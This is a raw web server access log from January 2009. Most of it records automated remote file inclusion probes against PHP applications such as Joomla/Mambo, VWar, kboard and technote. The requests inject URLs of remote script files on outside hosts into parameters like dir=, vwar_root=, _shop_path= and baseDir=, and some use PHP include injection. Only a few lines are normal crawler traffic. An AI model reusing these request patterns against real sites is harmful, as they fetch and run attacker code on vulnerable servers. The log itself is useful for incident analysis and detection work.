89.218.85.18 - - [15/Jan/2009:01:52:50 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.kmt-s.ru/chid.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
89.218.85.18 - - [15/Jan/2009:01:52:50 -0600] "GET //skin/zero_vote/error.php?dir=http://www.kmt-s.ru/chid.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
82.192.65.100 - - [15/Jan/2009:01:53:28 -0600] "GET /logs/access_log.1227312000//skin/zero_vote/error.php?dir=http://www.camelodromovirtual.com.br/vnc/idfeel.txt?? HTTP/1.1" 404 335 "-""Mozilla/4.61 [en] (OS/2; U)"
82.192.65.100 - - [15/Jan/2009:01:53:28 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.camelodromovirtual.com.br/vnc/idfeel.txt?? HTTP/1.1" 404 313 "-""Mozilla/4.61 [en] (OS/2; U)"
82.192.65.100 - - [15/Jan/2009:01:53:28 -0600] "GET //skin/zero_vote/error.php?dir=http://www.camelodromovirtual.com.br/vnc/idfeel.txt?? HTTP/1.1" 404 308 "-""Mozilla/4.61 [en] (OS/2; U)"
82.192.65.100 - - [15/Jan/2009:01:56:28 -0600] "GET /logs/access_log.1229817600//skin/zero_vote/error.php?dir=http://www.camelodromovirtual.com.br/vnc/idfeel.txt?? HTTP/1.1" 404 335 "-""Mozilla/4.61 [en] (OS/2; U)"
82.192.65.100 - - [15/Jan/2009:01:59:04 -0600] "GET /logs/access_log.1230422400//skin/zero_vote/error.php?dir=http://www.camelodromovirtual.com.br/vnc/idfeel.txt?? HTTP/1.1" 404 335 "-""Mozilla/4.61 [en] (OS/2; U)"
205.234.141.238 - - [15/Jan/2009:02:18:21 -0600] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://heatingfilm.com//kboard/data/bajo-id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.822"
205.234.141.238 - - [15/Jan/2009:02:18:21 -0600] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://heatingfilm.com//kboard/data/bajo-id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.822"
206.225.91.21 - - [15/Jan/2009:02:21:33 -0600] "GET /logs//?mosConfig_absolute_path=http://www.mandlakaziestates.co.za/contact.txt??? HTTP/1.1" 200 174181 "-""libwww-perl/5.79"
206.225.91.21 - - [15/Jan/2009:02:21:33 -0600] "GET /logs//?mosConfig_absolute_path=http://www.mandlakaziestates.co.za/contact.txt??? HTTP/1.1" 200 174181 "-""libwww-perl/5.79"
206.225.91.21 - - [15/Jan/2009:02:21:33 -0600] "GET //?mosConfig_absolute_path=http://www.mandlakaziestates.co.za/contact.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
206.225.91.21 - - [15/Jan/2009:02:21:33 -0600] "GET //?mosConfig_absolute_path=http://www.mandlakaziestates.co.za/contact.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
82.192.85.62 - - [15/Jan/2009:02:24:14 -0600] "GET //include/write.php?dir=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 301 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
66.98.248.88 - - [15/Jan/2009:02:25:58 -0600] "GET /logs//include/write.php?dir=http://www.terrytrippler.com/local.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.810"
66.98.248.88 - - [15/Jan/2009:02:25:58 -0600] "GET //include/write.php?dir=http://www.terrytrippler.com/local.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.810"
87.106.250.102 - - [15/Jan/2009:02:26:06 -0600] "GET /logs//errors.php?error=http://kocmo.org.ua//templates/Ilegalid.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.106.250.102 - - [15/Jan/2009:02:26:06 -0600] "GET //errors.php?error=http://kocmo.org.ua//templates/Ilegalid.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
82.192.65.100 - - [15/Jan/2009:02:27:29 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.camelodromovirtual.com.br/vnc/idfeel.txt?? HTTP/1.1" 404 312 "-""Mozilla/4.61 [en] (OS/2; U)"
82.192.65.100 - - [15/Jan/2009:02:27:29 -0600] "GET /logs/access_log.1227744000//modules/vwar/admin/admin.php?vwar_root=http://www.camelodromovirtual.com.br/vnc/idfeel.txt?? HTTP/1.1" 404 339 "-""Mozilla/4.61 [en] (OS/2; U)"
82.192.65.100 - - [15/Jan/2009:02:27:29 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.camelodromovirtual.com.br/vnc/idfeel.txt?? HTTP/1.1" 404 317 "-""Mozilla/4.61 [en] (OS/2; U)"
66.34.133.35 - - [15/Jan/2009:02:33:51 -0600] "GET //include/write.php?dir=http://www.radioadventista.com//images/contenido/readme.txt???? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
66.34.133.35 - - [15/Jan/2009:02:33:51 -0600] "GET /logs//include/write.php?dir=http://www.radioadventista.com//images/contenido/readme.txt???? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
87.233.130.27 - - [15/Jan/2009:02:36:05 -0600] "GET /logs//include/write.php?dir=http://kocmo.org.ua//templates/Ilegalid.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
87.233.130.27 - - [15/Jan/2009:02:36:06 -0600] "GET //include/write.php?dir=http://kocmo.org.ua//templates/Ilegalid.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
87.249.116.188 - - [15/Jan/2009:02:37:04 -0600] "GET //apboard/add.php?APB_rp=http://spass.huneck.eu/id/idfeelcomz.txt%0D? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
87.249.116.188 - - [15/Jan/2009:02:37:04 -0600] "GET /logs//apboard/add.php?APB_rp=http://spass.huneck.eu/id/idfeelcomz.txt%0D? HTTP/1.1" 404 304 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
87.249.116.188 - - [15/Jan/2009:02:37:04 -0600] "GET /logs/access_log.1229817600//apboard/add.php?APB_rp=http://spass.huneck.eu/id/idfeelcomz.txt%0D? HTTP/1.1" 404 326 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
64.235.60.76 - - [15/Jan/2009:02:39:39 -0600] "GET /logs//include/write.php?dir=http://siam2.com/ict/news/photo/.photo/cmdstring.swf? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
64.235.60.76 - - [15/Jan/2009:02:39:39 -0600] "GET //include/write.php?dir=http://siam2.com/ict/news/photo/.photo/cmdstring.swf? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
213.186.117.208 - - [15/Jan/2009:02:39:41 -0600] "GET /logs//include/write.php?dir=http://siam2.com/ict/news/photo/.photo/cmdstring.swf? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
213.186.117.208 - - [15/Jan/2009:02:39:41 -0600] "GET //include/write.php?dir=http://siam2.com/ict/news/photo/.photo/cmdstring.swf? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
66.7.216.240 - - [15/Jan/2009:02:41:39 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.camelodromovirtual.com.br/vnc/idfeel.txt?? HTTP/1.1" 404 317 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
66.7.216.240 - - [15/Jan/2009:02:41:39 -0600] "GET /logs/access_log.1227744000//modules/vwar/admin/admin.php?vwar_root=http://www.camelodromovirtual.com.br/vnc/idfeel.txt?? HTTP/1.1" 404 339 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
66.7.216.240 - - [15/Jan/2009:02:41:39 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.camelodromovirtual.com.br/vnc/idfeel.txt?? HTTP/1.1" 404 312 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
66.7.216.240 - - [15/Jan/2009:02:42:07 -0600] "GET /logs/access_log.1228348800//modules/vwar/admin/admin.php?vwar_root=http://www.camelodromovirtual.com.br/vnc/idfeel.txt?? HTTP/1.1" 404 339 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
72.32.68.106 - - [15/Jan/2009:02:42:48 -0600] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://newmardev.com/media/id.txt???? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
72.32.68.106 - - [15/Jan/2009:02:42:48 -0600] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://newmardev.com/media/id.txt???? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
72.32.68.106 - - [15/Jan/2009:02:52:10 -0600] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://newmardev.com/media/id.txt???? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
72.32.68.106 - - [15/Jan/2009:02:52:10 -0600] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://newmardev.com/media/id.txt???? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
128.112.139.195 - - [15/Jan/2009:03:35:13 -0600] "GET /chain_clasp_04.jpg HTTP/1.0" 200 62938 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20061201 Firefox/2.0.0.8 (Ubuntu-feisty)"
65.18.169.40 - - [15/Jan/2009:03:42:02 -0600] "GET /logs///vwar/backup/errors.php?error=http://webpower.jp/data/readme.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
65.18.169.40 - - [15/Jan/2009:03:42:02 -0600] "GET ///vwar/backup/errors.php?error=http://webpower.jp/data/readme.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
209.172.41.135 - - [15/Jan/2009:03:44:49 -0600] "GET /logs/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
209.172.41.135 - - [15/Jan/2009:03:44:56 -0600] "GET /errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
65.55.208.136 - - [15/Jan/2009:03:55:05 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.136 - - [15/Jan/2009:03:55:08 -0600] "GET /?N=D HTTP/1.1" 200 3245 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
64.235.60.76 - - [15/Jan/2009:04:05:27 -0600] "GET /logs//include/write.php?dir=http://siam2.com/ict/news/photo/.photo/cmdstring.swf? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
64.235.60.76 - - [15/Jan/2009:04:05:27 -0600] "GET //include/write.php?dir=http://siam2.com/ict/news/photo/.photo/cmdstring.swf? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
65.55.208.132 - - [15/Jan/2009:04:13:25 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.132 - - [15/Jan/2009:04:13:25 -0600] "GET /logs/access_log.1106611200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.132 - - [15/Jan/2009:04:13:25 -0600] "GET /logs/access_log.1153267200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.132 - - [15/Jan/2009:04:13:25 -0600] "GET /logs/access_log.1109030400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.132 - - [15/Jan/2009:04:13:27 -0600] "GET /logs/access_log.1189900800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
216.153.214.235 - - [15/Jan/2009:04:18:41 -0600] "GET //ask_password.php?dir=http://www.grimesplace.com/cache/read.txt??%0D?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
216.153.214.235 - - [15/Jan/2009:04:18:41 -0600] "GET /logs//ask_password.php?dir=http://www.grimesplace.com/cache/read.txt??%0D?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
87.249.116.188 - - [15/Jan/2009:04:23:19 -0600] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
87.249.116.188 - - [15/Jan/2009:04:23:19 -0600] "GET /logs/access_log.1227744000//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
87.249.116.188 - - [15/Jan/2009:04:23:19 -0600] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
87.249.116.188 - - [15/Jan/2009:04:23:57 -0600] "GET /logs/access_log.1228435200//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
87.249.116.188 - - [15/Jan/2009:04:55:38 -0600] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
87.249.116.188 - - [15/Jan/2009:04:55:38 -0600] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
87.249.116.188 - - [15/Jan/2009:04:55:38 -0600] "GET /logs/access_log.1227744000//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
87.249.116.188 - - [15/Jan/2009:04:55:59 -0600] "GET /logs/access_log.1228435200//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
64.151.255.1 - - [15/Jan/2009:04:59:49 -0600] "GET /logs/install.php?_shop_path=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
64.151.255.1 - - [15/Jan/2009:04:59:49 -0600] "GET /install.php?_shop_path=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
64.151.255.1 - - [15/Jan/2009:04:59:57 -0600] "GET /logs/?_shop_path=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 200 174176 "-""libwww-perl/5.805"
64.151.255.1 - - [15/Jan/2009:04:59:57 -0600] "GET /?_shop_path=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
70.86.113.106 - - [15/Jan/2009:05:26:52 -0600] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://philippinetribunal.org/help/ID.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.811"
70.86.113.106 - - [15/Jan/2009:05:26:52 -0600] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://philippinetribunal.org/help/ID.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.811"
83.222.23.232 - - [15/Jan/2009:05:29:42 -0600] "GET /logs/install.php?_shop_path=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
83.222.23.232 - - [15/Jan/2009:05:29:42 -0600] "GET /install.php?_shop_path=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
65.55.208.123 - - [15/Jan/2009:05:30:00 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.123 - - [15/Jan/2009:05:30:01 -0600] "GET /logs/access_log.1231632000 HTTP/1.1" 200 75840 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
83.222.23.232 - - [15/Jan/2009:05:30:19 -0600] "GET /logs/?_shop_path=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 200 174176 "-""libwww-perl/5.805"
83.222.23.232 - - [15/Jan/2009:05:30:19 -0600] "GET /?_shop_path=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
203.114.112.155 - - [15/Jan/2009:05:37:38 -0600] "GET /logs//include/bbs.lib.inc.php?site_path=http://wespenval.nl/bestel/images/canboy1? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
203.114.112.155 - - [15/Jan/2009:05:37:39 -0600] "GET //include/bbs.lib.inc.php?site_path=http://wespenval.nl/bestel/images/canboy1? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
38.96.163.67 - - [15/Jan/2009:05:49:33 -0600] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://h1.ripway.com/tondano123/nugeloid1.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
38.96.163.67 - - [15/Jan/2009:05:49:33 -0600] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://h1.ripway.com/tondano123/nugeloid1.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
83.222.23.229 - - [15/Jan/2009:05:50:11 -0600] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://h1.ripway.com/kalekek123/idomila.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
83.222.23.229 - - [15/Jan/2009:05:50:11 -0600] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://h1.ripway.com/kalekek123/idomila.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
83.222.23.229 - - [15/Jan/2009:05:50:13 -0600] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://h1.ripway.com/kalekek123/idomila.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
83.222.23.229 - - [15/Jan/2009:05:50:14 -0600] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://h1.ripway.com/kalekek123/idomila.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
94.103.82.87 - - [15/Jan/2009:05:52:27 -0600] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.britain.tv/pollphp/db/readme.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
89.186.1.54 - - [15/Jan/2009:05:55:02 -0600] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://h1.ripway.com/kalekek123/idomila.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.800"
89.186.1.54 - - [15/Jan/2009:05:55:03 -0600] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://h1.ripway.com/kalekek123/idomila.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.800"
89.186.1.54 - - [15/Jan/2009:05:55:10 -0600] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://h1.ripway.com/kalekek123/idomila.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.800"
89.186.1.54 - - [15/Jan/2009:05:55:11 -0600] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://h1.ripway.com/kalekek123/idomila.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.800"
94.103.82.87 - - [15/Jan/2009:05:57:42 -0600] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.britain.tv/pollphp/db/readme.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
82.192.85.62 - - [15/Jan/2009:06:10:12 -0600] "GET /errors.php?error=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
61.114.233.39 - - [15/Jan/2009:06:17:59 -0600] "GET /logs/install.php?_shop_path=http://www.aerothaiunion.com/bajo.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
61.114.233.39 - - [15/Jan/2009:06:17:59 -0600] "GET /install.php?_shop_path=http://www.aerothaiunion.com/bajo.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
209.126.254.112 - - [15/Jan/2009:06:21:42 -0600] "GET /logs/errors.php?error=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.76"
209.126.254.112 - - [15/Jan/2009:06:21:42 -0600] "GET /errors.php?error=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.76"
200.13.253.154 - - [15/Jan/2009:06:30:58 -0600] "GET /logs/access_log.1229817600//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
200.13.253.154 - - [15/Jan/2009:06:30:58 -0600] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
200.13.253.154 - - [15/Jan/2009:06:30:58 -0600] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
200.13.253.154 - - [15/Jan/2009:06:42:44 -0600] "GET /logs/access_log.1230076800//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
66.34.133.35 - - [15/Jan/2009:06:42:44 -0600] "GET //index.php?cmd&file=http://www.radioadventista.com//images/contenido/readme.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
66.34.133.35 - - [15/Jan/2009:06:42:44 -0600] "GET /logs//index.php?cmd&file=http://www.radioadventista.com//images/contenido/readme.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
66.34.133.35 - - [15/Jan/2009:06:42:44 -0600] "GET /logs/access_log.1228262400//index.php?cmd&file=http://www.radioadventista.com//images/contenido/readme.txt???? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
66.34.133.35 - - [15/Jan/2009:06:42:53 -0600] "GET /logs/access_log.1230076800//index.php?cmd&file=http://www.radioadventista.com//images/contenido/readme.txt???? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
66.98.248.88 - - [15/Jan/2009:06:43:32 -0600] "GET /logs/access_log.1228262400//index.php?cmd&file=http://www.terrytrippler.com/local.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
66.98.248.88 - - [15/Jan/2009:06:43:32 -0600] "GET //index.php?cmd&file=http://www.terrytrippler.com/local.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
66.98.248.88 - - [15/Jan/2009:06:43:32 -0600] "GET /logs//index.php?cmd&file=http://www.terrytrippler.com/local.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
66.98.248.88 - - [15/Jan/2009:06:43:39 -0600] "GET /logs/access_log.1230076800//index.php?cmd&file=http://www.terrytrippler.com/local.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
66.34.133.35 - - [15/Jan/2009:06:45:09 -0600] "GET /logs/access_log.1229817600//index.php?cmd&file=http://www.radioadventista.com//images/contenido/readme.txt???? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
66.98.248.88 - - [15/Jan/2009:06:46:18 -0600] "GET /logs/access_log.1229817600//index.php?cmd&file=http://www.terrytrippler.com/local.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
66.98.248.88 - - [15/Jan/2009:06:47:55 -0600] "GET //index.php?cmd&file=http://www.terrytrippler.com/local.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
66.98.248.88 - - [15/Jan/2009:06:47:55 -0600] "GET /logs/access_log.1228262400//index.php?cmd&file=http://www.terrytrippler.com/local.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
66.98.248.88 - - [15/Jan/2009:06:47:57 -0600] "GET /logs//index.php?cmd&file=http://www.terrytrippler.com/local.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
66.98.248.88 - - [15/Jan/2009:06:48:01 -0600] "GET /logs/access_log.1230076800//index.php?cmd&file=http://www.terrytrippler.com/local.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
66.98.248.88 - - [15/Jan/2009:06:50:52 -0600] "GET /logs/access_log.1229817600//index.php?cmd&file=http://www.terrytrippler.com/local.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
66.132.137.128 - - [15/Jan/2009:06:52:07 -0600] "GET /logs/?_shop_path=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 200 174176 "-""libwww-perl/5.65"
66.132.137.128 - - [15/Jan/2009:06:52:07 -0600] "GET /?_shop_path=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.65"
38.96.163.67 - - [15/Jan/2009:07:15:10 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://h1.ripway.com/tondano123/nugeloid1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
38.96.163.67 - - [15/Jan/2009:07:15:11 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://h1.ripway.com/tondano123/nugeloid1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
83.222.23.229 - - [15/Jan/2009:07:16:57 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://h1.ripway.com/kalekek123/idomila.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
83.222.23.229 - - [15/Jan/2009:07:16:58 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://h1.ripway.com/kalekek123/idomila.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
83.222.23.229 - - [15/Jan/2009:07:17:01 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://h1.ripway.com/kalekek123/idomila.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
83.222.23.229 - - [15/Jan/2009:07:17:01 -0600] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://h1.ripway.com/kalekek123/idomila.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.176.226.164 - - [15/Jan/2009:07:18:46 -0600] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.shadowclubgermany.net/shadow/readme.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
81.176.226.164 - - [15/Jan/2009:07:18:46 -0600] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.shadowclubgermany.net/shadow/readme.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
81.176.226.164 - - [15/Jan/2009:07:18:46 -0600] "GET /logs/access_log.1229040000//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.shadowclubgermany.net/shadow/readme.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
81.176.226.164 - - [15/Jan/2009:07:20:22 -0600] "GET /logs/access_log.1229817600//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.shadowclubgermany.net/shadow/readme.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
79.132.211.3 - - [15/Jan/2009:07:21:22 -0600] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.uarel.co.uk/webalizer/cmd.jpg? HTTP/1.1" 404 306 "-""libwww-perl/5.813"
79.132.211.3 - - [15/Jan/2009:07:21:23 -0600] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.uarel.co.uk/webalizer/cmd.jpg? HTTP/1.1" 404 301 "-""libwww-perl/5.813"
